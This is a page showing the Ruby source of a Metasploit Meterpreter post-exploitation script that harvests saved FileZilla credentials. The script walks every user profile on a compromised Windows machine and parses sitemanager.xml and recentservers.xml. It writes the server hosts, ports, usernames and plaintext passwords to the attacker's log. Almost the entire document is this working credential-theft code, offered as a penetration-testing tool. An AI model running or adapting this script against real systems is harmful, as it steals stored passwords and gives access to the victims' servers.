Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/scripts/meterpreter/get_filezilla_creds.rb
Views: 11766
##1# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.2# If you'd like to improve this script, please try to port it as a post3# module instead. Thank you.4##567require "rexml/document"89#-------------------------------------------------------------------------------10#Options and Option Parsing11opts = Rex::Parser::Arguments.new(12"-h" => [ false, "Help menu." ],13"-c" => [ false, "Return credentials." ]14)1516get_credentials=false1718opts.parse(args) { |opt, idx, val|19case opt20when "-h"21print_line "Meterpreter Script for extracting servers and credentials from Filezilla."22print_line(opts.usage)23raise Rex::Script::Completed24when "-c"25get_credentials=true26end27}28### If we get here and have none of our flags true, then we'll just29### get credentials30if !(get_credentials)31get_credentials=true32end3334#-------------------------------------------------------------------------------35#Set General Variables used in the script36@client = client37os = @client.sys.config.sysinfo['OS']38host = @client.sys.config.sysinfo['Computer']39# Create Filename info to be appended to downloaded files40filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")41# Create a directory for the logs42logs = ::File.join(Msf::Config.log_directory, 'filezilla', Rex::FileUtils.clean_path(host + filenameinfo) )43# Create the log directory44::FileUtils.mkdir_p(logs)45#logfile name46dest = Rex::FileUtils.clean_path(logs + "/" + host + filenameinfo + ".txt")4748#-------------------------------------------------------------------------------49#function for checking of FileZilla profile is present50def check_filezilla(path)51found = nil52@client.fs.dir.foreach(path) do |x|53next if x =~ /^(\.|\.\.)$/54if x =~ (/FileZilla/)55### If we find the path, let's return it56found = path + x57return found58end59end60return found61end6263#-------------------------------------------------------------------------------6465def extract_saved_creds(path,xml_file)66accounts_xml = ""67creds = ""68print_status("Reading #{xml_file} file...")69### modified to use pidgin_path, which already has .purple in it70account_file = @client.fs.file.new(path + "\\#{xml_file}", "rb")71until account_file.eof?72accounts_xml << account_file.read73end74account_file.close75doc = (REXML::Document.new accounts_xml).root76doc.elements.to_a("//Server").each do |e|77print_status "\tHost: #{e.elements["Host"].text}"78creds << "Host: #{e.elements["Host"].text}"79print_status "\tPort: #{e.elements["Port"].text}"80creds << "Port: #{e.elements["Port"].text}"81logon_type = e.elements["Logontype"].text82if logon_type == "0"83print_status "\tLogon Type: Anonymous"84creds << "Logon Type: Anonymous"85elsif logon_type =~ /1|4/86print_status "\tUser: #{e.elements["User"].text}"87creds << "User: #{e.elements["User"].text}"88print_status "\tPassword: #{e.elements["Pass"].text}"89creds << "Password: #{e.elements["Pass"].text}"90elsif logon_type =~ /2|3/91print_status "\tUser: #{e.elements["User"].text}"92creds << "User: #{e.elements["User"].text}"93end9495proto = e.elements["Protocol"].text96if proto == "0"97print_status "\tProtocol: FTP"98creds << "Protocol: FTP"99elsif proto == "1"100print_status "\tProtocol: SSH"101creds << "Protocol: SSH"102elsif proto == "3"103print_status "\tProtocol: FTPS"104creds << "Protocol: FTPS"105elsif proto == "4"106print_status "\tProtocol: FTPES"107creds << "Protocol: FTPES"108end109print_status ""110creds << ""111112end113#114return creds115end116#-------------------------------------------------------------------------------117#Function to enumerate the users if running as SYSTEM118def enum_users(os)119users = []120121path4users = ""122sysdrv = @client.sys.config.getenv('SystemDrive')123124if os =~ /7|Vista|2008/125path4users = sysdrv + "\\users\\"126path2purple = "\\AppData\\Roaming\\"127else128path4users = sysdrv + "\\Documents and Settings\\"129path2purple = "\\Application Data\\"130end131132if is_system?133print_status("Running as SYSTEM extracting user list..")134@client.fs.dir.foreach(path4users) do |u|135userinfo = {}136next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/137userinfo['username'] = u138userinfo['userappdata'] = path4users + u + path2purple139users << userinfo140end141else142userinfo = {}143uservar = @client.sys.config.getenv('USERNAME')144userinfo['username'] = uservar145userinfo['userappdata'] = path4users + uservar + path2purple146users << userinfo147end148return users149end150151################## MAIN ##################152if client.platform == 'windows'153print_status("Running Meterpreter FileZilla Credential harvester script")154print_status("All services are logged at #{dest}")155enum_users(os).each do |u|156print_status("Checking if Filezilla profile is present for user :::#{u['username']}:::...")157### Find the path (if it exists) for this user,158filezilla_path = check_filezilla(u['userappdata'])159if filezilla_path160print_status("FileZilla profile found!")161### modified to use filezilla_path162xml_cfg_files = ['sitemanager.xml','recentservers.xml']163if get_credentials164xml_cfg_files.each do |xml_cfg_file|165file_local_write(dest,extract_saved_creds(filezilla_path,xml_cfg_file))166end167end168169else170print_error("Filezilla profile not found!")171end172end173else174print_error("This version of Meterpreter is not supported with this Script!")175raise Rex::Script::Completed176end177178179